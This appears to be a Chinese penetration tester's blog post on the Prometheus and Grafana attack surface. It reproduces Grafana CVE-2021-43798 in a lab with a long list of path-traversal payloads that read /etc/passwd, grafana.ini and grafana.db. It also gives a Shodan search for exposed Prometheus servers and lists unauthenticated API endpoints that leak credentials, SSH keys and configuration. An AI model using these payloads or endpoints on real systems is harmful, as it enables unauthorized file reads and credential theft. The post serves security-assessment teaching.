前言
一个正在上班的安服仔,突然收到扫描器扫出来的一个信息泄漏漏洞,定睛一看Prometheus普罗米修斯未授权访问漏洞
wc,这个漏洞,有一个信息泄露,其他肯定也有,于是乎,进去一顿捣鼓!!
基本介绍
prometheus+grafana一般合起来用,作用是监控,配置请看
https://blog.csdn.net/qq_36357820/article/details/80777167
Prometheus(普罗米修斯)是一套开源的监控&报警&时间序列数据库的组合,起始是由SoundCloud公司开发的。随着发展,越来越多公司和组织接受采用Prometheus,社会也十分活跃,他们便将它独立成开源项目,并且有公司来运作。Google SRE的书内也曾提到跟他们BorgMon监控系统相似的实现是Prometheus。现在最常见的Kubernetes容器管理系统中,通常会搭配Prometheus进行监控。
Prometheus基本原理是通过HTTP协议周期性抓取被监控组件的状态,这样做的好处是任意组件只要提供HTTP接口就可以接入监控系统,不需要任何SDK或者其他的集成过程。这样做非常适合虚拟化环境比如VM或者Docker 。
Prometheus应该是为数不多的适合Docker、Mesos、Kubernetes环境的监控系统之一。
输出被监控组件信息的HTTP接口被叫做exporter 。目前互联网公司常用的组件大部分都有exporter可以直接使用,比如Varnish、Haproxy、Nginx、MySQL、Linux 系统信息 (包括磁盘、内存、CPU、网络等等),具体的看:https://github.com/prometheus。
exporter长这样
harbor_exporter、mysqld exporter、named process exporter、node exporter、redis exporter v1.27.0
Prometheus自带的图形并不够强大,于是我们可以使用Grafana作为Prometheus的Dashboard
Grafana任意文件读取漏洞(CVE-2021-43798)
更新vulhub目录,进入vulhub/grafana/CVE-2021-43798
docker-compose up –d #下载安装漏洞镜像
访问目标3000端口,来到这个页面,账号密码是:<系统名>admin/<系统名>@123456
payload参考https://github.com/jas502n/Grafana-CVE-2021-43798/blob/main/README.md
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd/public/plugins/annolist/../../../../../../../../../../../etc/passwd/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd/public/plugins/barchart/../../../../../../../../../../../etc/passwd/public/plugins/bargauge/../../../../../../../../../../../etc/passwd/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd/public/plugins/dashlist/../../../../../../../../../../../etc/passwd/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd/public/plugins/gauge/../../../../../../../../../../../etc/passwd/public/plugins/geomap/../../../../../../../../../../../etc/passwd/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd/public/plugins/graph/../../../../../../../../../../../etc/passwd/public/plugins/graphite/../../../../../../../../../../../etc/passwd/public/plugins/heatmap/../../../../../../../../../../../etc/passwd/public/plugins/histogram/../../../../../../../../../../../etc/passwd/public/plugins/influxdb/../../../../../../../../../../../etc/passwd/public/plugins/jaeger/../../../../../../../../../../../etc/passwd/public/plugins/logs/../../../../../../../../../../../etc/passwd/public/plugins/loki/../../../../../../../../../../../etc/passwd/public/plugins/mssql/../../../../../../../../../../../etc/passwd/public/plugins/mysql/../../../../../../../../../../../etc/passwd/public/plugins/news/../../../../../../../../../../../etc/passwd/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd/public/plugins/piechart/../../../../../../../../../../../etc/passwd/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd/public/plugins/postgres/../../../../../../../../../../../etc/passwd/public/plugins/prometheus/../../../../../../../../../../../etc/passwd/public/plugins/stat/../../../../../../../../../../../etc/passwd/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd/public/plugins/status-history/../../../../../../../../../../../etc/passwd/public/plugins/table/../../../../../../../../../../../etc/passwd/public/plugins/table-old/../../../../../../../../../../../etc/passwd/public/plugins/tempo/../../../../../../../../../../../etc/passwd/public/plugins/testdata/../../../../../../../../../../../etc/passwd/public/plugins/text/../../../../../../../../../../../etc/passwd/public/plugins/timeseries/../../../../../../../../../../../etc/passwd/public/plugins/welcome/../../../../../../../../../../../etc/passwd/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
漏洞复现
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd
读取Grafana配置文件
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini
读取Grafana数据库
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db备注gettingstarted是插件ID,Grafana默认安装的就有
Prometheus普罗米修斯未授权访问漏洞(全)
由于之前开发者认为 Prometheus 捕获的数字指标不被视为敏感数据,所以开发者采取了一种策略,即内置没有对身份验证和加密等安全功能的支持,直到在 2.24.0 版本中引入了传输层安全性 (TLS) 和基本身份验证支持。
相关issues:https://github.com/juice-shop/juice-shop/issues/1275
但是很多 Prometheus 的使用者并未启用这些功能,因此许多 Prometheus 完全暴露在 互联网上
下图显示了Prometheus 架构的简化结构
在shodan中输入可以查看到4w多台设备http.favicon.hash:-1399433489
Prometheus 从目标服务中提取数据,将其聚合,然后将其传递到数据库
/graph 节点提供了以一个简单的可视化界面,主要使用表达式进行临时查询和调试
查询语法参考:https://prometheus.io/docs/prometheus/latest/querying/basics/
Kubernetes 云原生集群监控主要涉及到如下三类指标:node 物理节点指标、pod & container 容器资源指标和Kubernetes 云原生集群资源指标,下面是抓取指标列表:
kube_limitrange{}kube_replicaset_created{}kube_persistentvolumeclaim_status_phase{}kube_pod_container_status_terminated{}kube_secret_info{}kube_service_info{}kube_daemonset_status_observed_generation{}kube_node_role{}kube_persistentvolume_claim_ref{}kube_pod_start_time{}kube_configmap_info{}kube_daemonset_created{}kube_endpoint_address_not_ready{}kube_node_created{}kube_pod_init_container_status_waiting{}kube_secret_metadata_resource_version{}kube_pod_container_resource_requests{}kube_pod_status_ready{}kube_secret_created{}kube_persistentvolume_capacity_bytes{}kube_persistentvolumeclaim_info{}kube_pod_status_reason{}kube_secret_type{}kube_deployment_spec_strategy_rollingupdate_max_unavailable{}kube_deployment_status_condition{}kube_pod_container_status_ready{}kube_pod_created{}kube_deployment_spec_replicas{}kube_ingress_metadata_resource_version{}kube_ingress_tls{}kube_persistentvolumeclaim_resource_requests_storage_bytes{}kube_deployment_status_replicas{}kube_limitrange_created{}kube_namespace_status_phase{}kube_node_info{}kube_endpoint_address_available{}kube_ingress_labels{}kube_pod_init_container_status_restarts_total{}kube_daemonset_status_number_unavailable{}kube_endpoint_created{}kube_pod_status_phase{}kube_deployment_spec_strategy_rollingupdate_max_surge{}kube_deployment_status_replicas_available{}kube_node_spec_unschedulable{}kube_deployment_metadata_generation{}kube_lease_renew_time{}kube_node_status_capacity{}kube_persistentvolumeclaim_access_mode{}kube_daemonset_status_updated_number_scheduled{}kube_namespace_created{}kube_persistentvolume_status_phase{}kube_pod_container_status_running{}kube_daemonset_metadata_generation{}kube_node_status_allocatable{}kube_pod_container_resource_limits{}kube_pod_init_container_status_terminated_reason{}kube_configmap_created{}kube_ingress_path{}kube_pod_restart_policy{}kube_replicaset_status_ready_replicas{}kube_namespace_labels{}kube_pod_status_scheduled_time{}kube_configmap_metadata_resource_version{}kube_pod_info{}kube_pod_spec_volumes_persistentvolumeclaims_info{}kube_replicaset_owner{}kube_pod_owner{}kube_pod_status_scheduled{}kube_daemonset_labels{}kube_deployment_created{}kube_deployment_spec_paused{}kube_persistentvolume_info{}kube_pod_container_status_restarts_total{}kube_pod_init_container_status_ready{}kube_service_created{}kube_persistentvolume_labels{}kube_daemonset_status_number_available{}kube_node_spec_taint{}kube_pod_completion_time{}kube_pod_container_info{}kube_pod_init_container_status_running{}kube_replicaset_labels{}kube_daemonset_status_number_ready{}kube_deployment_status_observed_generation{}kube_ingress_info{}kube_node_labels{}kube_pod_container_status_terminated_reason{}kube_pod_init_container_info{}kube_daemonset_status_number_misscheduled{}kube_deployment_status_replicas_updated{}kube_endpoint_info{}kube_endpoint_labels{}kube_secret_labels{}kube_deployment_status_replicas_unavailable{}kube_lease_owner{}kube_pod_container_status_waiting{}kube_daemonset_status_current_number_scheduled{}kube_ingress_created{}kube_replicaset_metadata_generation{}kube_deployment_labels{}kube_node_status_condition{}kube_pod_container_status_last_terminated_reason{}kube_pod_init_container_status_terminated{}kube_service_spec_type{}kube_persistentvolumeclaim_labels{}kube_pod_container_state_started{}kube_pod_labels{}kube_replicaset_status_observed_generation{}kube_service_labels{}kube_daemonset_status_desired_number_scheduled{}kube_pod_spec_volumes_persistentvolumeclaims_readonly{}kube_replicaset_status_replicas{}kube_replicaset_spec_replicas{}kube_replicaset_status_fully_labeled_replicas{}
API端点泄露敏感信息
参考文档:https://prometheus.io/docs/prometheus/latest/querying/api/
/api/v1/status/config接口返回加载的 (YAML) 配置文件。
该文件还包含目标地址和警报/发现服务以及访问它们所需的凭据。通常,Prometheus 会用占位符替换凭据配置配置字段中的密码(拿到一些认证的用户名用来后续爆破等操作):
但是一些 Prometheus 不直接监控的应用的用户名和密码,认证信息等可能会被泄露,例如gitlab:
/api/v1/targets接口会以json的形式返回目标机器地址、元数据标签、及其它敏感信息。
这里面写泄漏了另一个路径,/metrics_node,但是也能发现端口改变了,所以需要我们重新构造
来到这个页面发现,泄露主机名,网卡,存储空间,网络状态,并且还是实时更新的
/api/v1/status/config
此文件还包含目标和警报/发现服务的地址以及访问它们所需的凭据。通常,Prometheus 会用占位符 替换凭据配置字段中的密码(尽管这仍然会泄露用户名):
但是,由于 Prometheus 不会直接监控、删除或以其他方式屏蔽 URL 字符串中提供的用户名和密码,因此这些敏感数据会完全泄露
当返回信息包含
_meta_gce_metadata_startup_script的标签可能会泄露凭据
__meta_gce_metadata_ssh_keys标签会泄露SSH密钥
Kubernetes 服务发现机制在某些情况下可以直接暴露用户名和密码
管理员接口未授权
Prometheus 提供了一个可选的管理 API,可以通过标志web.enable-admin-api和web.enable-lifecycle. 这些端点分别允许删除所有保存的指标和关闭监控服务器。
默认情况下这个接口是禁用的,但在一些不安全的部署中,使用者可能开启这些选项,攻击者可以从 API 端点 /api/v1/status/flags 查询这些设置的状态,以检查它们是否已手动启用:
{"status": "success","data": {"web.enable-admin-api": "false","web.enable-lifecycle": "false",}}
我这里已经让他们关闭了,所以就不进行利用了
总结
现在越来越多服务器上云,所以对于我们安全人员来说,云系统会产生新的漏洞,需要我们持续密切关注新型的云平台漏洞
原文始发于微信公众号(隐雾安全):prometheus+grafana云原生监控系统攻击面
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论